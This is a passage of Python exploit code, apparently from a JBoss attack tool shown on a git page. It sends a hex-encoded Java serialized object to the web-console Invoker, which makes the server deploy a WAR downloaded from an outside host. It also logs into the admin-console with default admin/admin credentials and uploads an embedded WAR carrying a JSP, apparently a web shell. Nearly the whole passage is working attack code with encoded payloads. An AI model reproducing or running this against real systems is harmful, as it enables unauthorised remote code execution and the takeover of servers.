"\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f"
"\x74\x65\x4d\x42\x65\x61\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f"
"\xa3\x7a\x74\xae\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e"
"\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74"
"\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73\x74\x00\x13\x5b\x4c"
"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x5b\x00"
"\x09\x73\x69\x67\x6e\x61\x74\x75\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61"
"\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72"
"\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a\x61"
"\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f\x4f\x62\x6a\x65"
"\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06\x64\x65\x70\x6c\x6f\x79\x75"
"\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65"
"\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00"
"\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25"
"\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64"
"\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74"
"\x79\x71\x00\x7e\x00\x01\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x01\x4c"
"\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x01\x4c\x00\x08\x70\x72\x6f\x74\x6f"
"\x63\x6f\x6c\x71\x00\x7e\x00\x01\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x01"
"\x78\x70\xff\xff\xff\xff\xff\xff\xff\xff\x74\x00\x0e\x6a\x6f\x61\x6f\x6d\x61"
"\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x74\x00\x0f\x2f\x72\x6e\x70\x2f\x6a\x65\x78"
"\x77\x73\x33\x2e\x77\x61\x72\x71\x00\x7e\x00\x0b\x74\x00\x04\x68\x74\x74\x70"
"\x70\x78\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53"
"\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70"
"\x00\x00\x00\x01\x74\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c"
"\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e"
"\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15"
"\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74"
"\x65\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c"
"\x6f\x79\x65\x72\x78")
headers = {
"Content-Type": "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
result = r.status
if result == 401:
print(" Retrying...")
pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
return get_successfully(url, "/jexws3/jexws3.jsp")
def get_viewstat_admin_console(page):
page = str(page).replace("\\n", "\n")
for i in page.split('\n'):
if 'javax.faces.ViewState' in i:
if i.count('value') ==1:
return i.split("value=\"")[1].split("\"")[0]
else:
return i.split("value=\"")[2].split("\"")[0]
def get_boundary_admin_console(jboss_version, state, payload):
boundary = "-----------------------------8994251555011888521050172030\r\n"
if jboss_version == 6:
data = boundary
data += "Content-Disposition: form-data; name=\"createContentForm\"\r\n"
data += "\r\n"
data += "createContentForm\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:file\"; filename=\"jexws3.war\"\r\n"
data += "Content-Type: application/octet-stream\r\n"
data += "\r\n"
data += payload + "\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-0_328868266\"\r\n"
data += "\r\n"
data += "false\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-0_-1257012452\"\r\n"
data += "\r\n"
data += "false\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:addButton\"\r\n"
data += "\r\n"
data += "Continue\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n"
data += "\r\n"
data += state + "\r\n"
data += "-----------------------------8994251555011888521050172030--\r\n"
return data
elif jboss_version == 5:
data = boundary
data += "Content-Disposition: form-data; name=\"createContentForm\"\r\n"
data += "\r\n"
data += "createContentForm\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:file\"; filename=\"jexws3.war\"\r\n"
data += "Content-Type: application/octet-stream\r\n"
data += "\r\n"
data += payload + "\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-1995377939_328868266\"\r\n"
data += "\r\n"
data += "false\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:addButton\"\r\n"
data += "\r\n"
data += "Continue\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n"
data += "\r\n"
data += state + "\r\n"
data += "-----------------------------8994251555011888521050172030--\r\n"
return data
def url_encode(text):
if version_info[0] >= 3:
return quote(text)
else:
return urllib.quote_plus(text)
def exploit_admin_console(url):
"""
Exploits admin-console
tested and works in JBoss 5 and 6
:param url: The URL to exploit
:return: The HTTP status code
"""
# Use default password for Jboss 5 and 6
username = "admin"
password = "admin"
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.request('GET', url+"/admin-console/login.seam", headers=headers)
cookie = r.getheader('set-cookie').split(";")[0]
headers['Cookie'] = cookie
state = get_viewstat_admin_console(r.data)
#payload = ("login_form=login_form&login_form:name=%s&login_form:password=%s&login_form:submit=Login"
# "&javax.faces.ViewState=%s" % (username, password, state))
payload = "login_form=login_form&login_form%3Aname="+username+"&login_form%3Apassword="+password+"&login_form%3Asubmit=Login&javax.faces.ViewState="+url_encode(state)
headers['Content-Type'] = "application/x-www-form-urlencoded"
print(GREEN + "\n * Info: Trying to perform authentication with default credentials..." +ENDC)
r = pool.request('POST', url+"/admin-console/login.seam", body=payload, headers=headers, redirect=False)
state = get_viewstat_admin_console(r.data)
if r.status == 302:
print(GREEN + " * Info: Successfully logged in! Wait..." + ENDC)
location = r.getheader('Location')
conversation_id = location.split('=')[1]
r = pool.request('GET', location, headers=headers)
if state == None:
sleep(7)
r = pool.request('GET', url+"/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR"
"%29&conversationId="+conversation_id+"&conversationPropagation=end", headers=headers)
conversation_id = str(int(conversation_id)+1)
r = pool.request('GET', url+"/admin-console/secure/resourceTypeSummary.seam?actionMethod=secure%2FresourceType"
"Summary.xhtml%3AcreateContentBackedResourceAction.init%28%29&conversationId="
+ conversation_id, headers=headers)
state = get_viewstat_admin_console(r.data)
headers['Content-Type'] = "multipart/form-data; boundary=---------------------------8994251555011888521050172030"
payload = ("\x50\x4b\x03\x04\x14\x00\x08\x08\x08\x00\x6d\x7c\x98\x48\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x04\x00\x4d\x45\x54\x41\x2d\x49\x4e"
"\x46\x2f\xfe\xca\x00\x00\x03\x00\x50\x4b\x07\x08\x00\x00\x00\x00\x02\x00\x00"
"\x00\x00\x00\x00\x00\x50\x4b\x03\x04\x14\x00\x08\x08\x08\x00\x6d\x7c\x98\x48"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x4d\x45\x54"
"\x41\x2d\x49\x4e\x46\x2f\x4d\x41\x4e\x49\x46\x45\x53\x54\x2e\x4d\x46\xf3\x4d"
"\xcc\xcb\x4c\x4b\x2d\x2e\xd1\x0d\x4b\x2d\x2a\xce\xcc\xcf\xb3\x52\x30\xd4\x33"
"\xe0\xe5\x72\x2e\x4a\x4d\x2c\x49\x4d\xd1\x75\xaa\x04\x09\x58\xe8\x19\xc4\x9b"
"\x9b\x2b\x68\xf8\x17\x25\x26\xe7\xa4\x2a\x38\xe7\x17\x15\xe4\x17\x25\x96\x00"
"\x95\x6b\xf2\x72\xf1\x72\x01\x00\x50\x4b\x07\x08\x05\xa0\x0e\xbc\x43\x00\x00"
"\x00\x44\x00\x00\x00\x50\x4b\x03\x04\x14\x00\x08\x08\x08\x00\x68\x7c\x98\x48"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x6a\x65\x78"
"\x77\x73\x33\x2e\x6a\x73\x70\x95\x55\x5f\x6f\x1a\x39\x10\x7f\xbf\x4f\x31\xb1"
"\x94\xca\x94\xb2\xb4\xba\x97\x53\x08\xd1\xa5\xb9\x54\x69\x14\xe9\x22\x52\xae"
"\x0f\xa7\xaa\x32\xbb\x03\xeb\x74\xd7\xf6\xd9\xb3\x05\x94\xf2\xdd\x6f\xec\x05"
"\x02\x85\x6b\x75\x2f\xbb\xc6\x33\x9e\x9d\xf9\xfd\x31\xe7\xa7\xbf\x83\x53\x33"
"\x04\x5d\x3b\xeb\x69\x28\x1e\xd5\x57\x95\x35\xa4\xab\xec\xe5\xab\xb4\xd6\x96"
"\x57\x90\x96\x06\x29\x7b\x29\x52\xfe\xb5\xc9\x6d\xa1\xcd\x6c\x28\xc6\x1f\xde"
"\xf5\x7e\x13\xa7\x17\x70\xee\x3c\xf2\xf3\x14\xb4\x21\xf8\x8a\x3e\x68\x6b\x60"
"\x08\xbf\x0e\x40\x4f\x41\x7a\xfc\xa7\xc1\x40\xd9\x0c\xe9\x5e\x79\x55\x23\xa1"
"\x97\xc2\x39\x27\x3a\x70\x32\x04\xd3\x54\x55\x07\x9e\x60\x62\x6d\x85\xca\x40"
"\x5e\x62\xfe\x65\xec\x0a\x45\x18\x06\x70\x43\xe4\xc6\xa3\xbb\x2b\x6b\x0c\xe6"
"\x14\xeb\xe6\xbc\xbc\xda\xc9\x81\xb6\xc4\x00\xde\x36\xd3\x29\x7a\x2c\x46\xa8"
"\x0a\xf4\x30\xf1\xdb\x88\xc7\xe0\xac\x09\x98\x05\x24\xae\x44\x68\xe8\xc3\xd2"
"\xa1\x14\x84\x0b\xea\x97\x54\x57\xa2\x73\xd0\xeb\x4d\x2a\x23\x45\xea\xa7\xd7"
"\xb4\x1f\x7b\x6e\x19\x5e\xbc\x80\x9f\x67\x67\x9c\xa1\xaa\x20\xc5\x94\x9f\x28"
"\x3a\x9d\xa7\xbd\xf9\xb8\xc3\x14\x18\xc0\x0a\xf9\x05\x07\x51\xf2\x0d\x07\x8f"
"\x8c\x2c\x0f\x80\xe9\x80\xc1\x39\xf0\x96\x14\x25\xc7\xce\xfa\xfd\x39\x4e\x42"
"\x89\x55\x95\x3d\xe2\x62\x62\x43\x88\x2c\xf6\x1f\x83\xfb\xbc\xa6\x28\xa3\x05"
"\x71\x8b\xd6\xa1\x79\x2e\x23\x19\x89\x15\x3c\x90\x67\x8a\x21\x94\xfc\xa9\x1f"
"\xf0\x37\xd8\x24\x56\x2a\xd0\x8d\x6d\x7c\xea\x32\xb6\x17\x7b\xf9\x83\x7b\x95"
"\x9d\x8c\x6c\x9b\xc4\xcb\xe0\x2a\x4d\x52\x9c\x89\xce\xdf\xaf\x3f\x75\x45\x99"
"\x55\x76\xc6\x1d\x78\x74\x95\xca\xf1\xb2\xaa\xa4\x00\xf1\x0a\x44\x2f\x96\x26"
"\xbf\x7c\x4a\xa4\xec\x63\xd2\x82\x12\x81\xfc\x0e\x95\xc8\xee\xa8\xed\xf5\xde"
"\xf3\x50\x9e\x96\x52\x8c\x03\xfa\xde\xe5\x8c\x19\xe7\xba\x47\xf8\xba\xb1\x81"
"\x31\xe8\x8a\xf3\x9e\xe8\xee\x84\x47\x58\x5b\xc2\xcb\xa2\xf0\xb2\xb3\x96\xc6"
"\x49\x1c\xe9\x9d\xae\x70\x4d\xf2\x67\xd1\xdd\x9b\x9a\xb9\x5e\xe8\x40\x41\x46"
"\x92\xef\x79\x60\xfa\xe8\x35\x43\x05\xf3\xf6\x35\x4c\xfc\xec\x04\xfe\xab\xce"
"\x60\x7d\x22\xcb\x2b\x1b\x30\xf2\x31\xd9\x9c\xde\x97\x78\x02\xf9\xbd\x71\x0d"
"\x31\xc0\xa8\xea\xf5\xee\x01\x2e\x3c\xcf\x4e\x16\xf7\x17\x27\x62\xa7\xc6\xcf"
"\xfe\xb5\x75\xeb\x7b\xf6\xc5\x8c\xbf\xea\x94\x0f\xc8\x3f\xe4\xc4\x33\x31\xaa"
"\xb8\xd3\x06\x9f\xa9\x03\xa6\xee\xcd\xa7\x35\x24\xbb\x05\x2e\x36\xc6\xe7\xe9"
"\x6d\x43\x99\x8b\x83\x4a\x71\xcf\x9e\x66\x61\x1b\x46\xf3\x0c\xa8\xe4\xe6\x41"
"\x07\x60\x9b\xb7\x16\x01\xb2\x70\x8b\x8b\xb7\xac\x4e\xb8\x7d\xb8\x87\x8f\x1b"
"\xc9\xf2\x8a\xe9\xca\x6d\x5d\xa3\x29\xf8\xa0\x22\x58\xda\x86\xb7\x7c\x63\x62"
"\x9d\xed\x29\x2e\xc0\x80\xb0\x80\xec\x32\xed\x47\x4c\x36\x57\x90\x9d\xc2\xc6"
"\x03\x3c\x30\xdc\xa6\x03\x2c\x08\x8e\x03\x03\x43\x58\x64\x22\xc9\x7d\x05\xc9"
"\x7e\x71\xa6\x50\x66\x0c\x20\x29\x6d\xd8\xb5\xba\x60\xc3\x7f\xfb\x06\xfb\x9b"
"\x8e\xd7\x53\xcd\xc2\x8d\xd7\xd6\x4f\xd1\x6e\xeb\xaf\x20\x57\x94\x97\xf2\x7a"
"\x91\xa3\x4b\xf7\x18\x4b\x78\x8b\x53\x65\xa4\xb8\xf6\xde\xfa\xd6\xff\xd1\x51"
"\x53\xfe\xb1\xbd\x46\x06\xab\xe8\x06\x88\xba\xb2\x39\xf2\x10\xae\x25\xe0\x61"
"\xc9\x43\xd4\xc9\x99\x5b\xc5\x5b\xf6\x39\x9b\x54\x44\xe3\xdd\xd9\x39\xfa\x2b"
"\x15\x55\x94\x69\x53\xe0\xe2\xcf\xa9\x14\x73\x6d\x78\xaa\x0b\x78\x1d\x27\x3b"
"\x39\x56\x62\xca\x2a\x67\x37\xb1\x12\x14\x59\xbf\x73\x8b\xf5\xd3\x0d\xe6\x58"
"\x2d\xa3\xc6\x90\xae\x31\x79\xa5\x5d\xca\x68\x00\xcc\x59\xd5\x75\x11\x57\xd0"
"\xbf\x02\xd1\x0d\x65\x02\x60\x7d\xbb\xfd\xf8\xe4\x3a\xf7\xff\xa9\xdd\x1d\x95"
"\xf7\xfa\x5a\x2a\x74\x88\xc5\xf6\x94\xcc\xf6\x2a\x79\x3e\x90\x29\xb8\xf3\x07"
"\xb4\xcb\x46\x8c\x71\xe6\xf1\xf3\xcc\xe6\x21\x99\xdf\x15\x10\x63\xf3\xc5\xd8"
"\x79\xfc\xbb\xaa\x6b\x65\x9e\x85\x76\x7a\xf1\xcb\xbf\x50\x4b\x07\x08\x25\x39"
"\x60\x50\x70\x03\x00\x00\x7a\x07\x00\x00\x50\x4b\x01\x02\x14\x00\x14\x00\x08"
"\x08\x08\x00\x6d\x7c\x98\x48\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00"
"\x09\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4d"
"\x45\x54\x41\x2d\x49\x4e\x46\x2f\xfe\xca\x00\x00\x50\x4b\x01\x02\x14\x00\x14"
"\x00\x08\x08\x08\x00\x6d\x7c\x98\x48\x05\xa0\x0e\xbc\x43\x00\x00\x00\x44\x00"
"\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3d\x00\x00"
"\x00\x4d\x45\x54\x41\x2d\x49\x4e\x46\x2f\x4d\x41\x4e\x49\x46\x45\x53\x54\x2e"
"\x4d\x46\x50\x4b\x01\x02\x14\x00\x14\x00\x08\x08\x08\x00\x68\x7c\x98\x48\x25"
"\x39\x60\x50\x70\x03\x00\x00\x7a\x07\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\xc2\x00\x00\x00\x6a\x65\x78\x77\x73\x33\x2e\x6a\x73"
"\x70\x50\x4b\x05\x06\x00\x00\x00\x00\x03\x00\x03\x00\xb5\x00\x00\x00\x6a\x04"
"\x00\x00\x00\x00")
data = get_boundary_admin_console(jboss_version=6, state=state, payload=payload)
try:
r = pool.request('POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers,body=data)
if r.status != 302:
data = get_boundary_admin_console(jboss_version=5, state=state, payload=payload)
r = pool.request('POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers, body=data)
except:
sleep(1)
return get_successfully(url, "/jexws3/jexws3.jsp")
else:
print(RED + "\n * Authentication failed!" + ENDC)
return 404
Reference in New Issue View Git Blame Copy Permalink